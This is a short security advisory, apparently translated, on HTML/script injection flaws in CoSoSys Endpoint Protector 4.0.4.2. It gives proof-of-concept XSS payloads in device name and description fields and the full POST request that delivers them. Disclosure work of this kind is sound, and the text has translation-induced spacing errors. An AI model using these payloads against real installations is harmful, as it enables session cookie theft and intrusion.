Release date:
Updated on:
Affected Systems:
CoSoSys Endpoint Protector 4.0.4.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56323
CoSoSys Endpoint Protector is a data loss protection software.
The Endpoint Protector 4.0.4.2 and other versions have multiple HTML Injection Vulnerabilities. After successful exploitation, you can view the HTML and script code provided by attackers in the affected browsers.
<* Source: Juan Manuel Garcia
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
* The parameter "client_device [name]" in the POST request has been set:
<Script> alert (document. cookie) </script>
* The parameter "client_device [description]" in the POST request has been set:
<Script> alert (1) </script>
POST/index. php/clientdevice/create HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 11.0) Gecko/20100101 Firefox/11.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.example.com/index.php/
Cookie: place = clientdevice; mark = clientdevice; ratool = d4d3242c4444154d035b7f797738837e
Content-Type: multipart/form-data; boundary = ---------------------------
17723440641777718806882422624
Content-Length: 1131
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "id"
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [department_id]"
1
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [device_type_id]"
1
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [name]"
<Script> alert (document. cookie) </script>
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [description]"
<Script> alert (1) </script>
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [vid]"
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [pid]"
----------------------------- 17723440641777718806882422624
Content-Disposition: form-data; name = "client_device [serialno]"
--------------------------- 17723440641777718806882422624 --
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
CoSoSys
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Www.endpointprotector.com/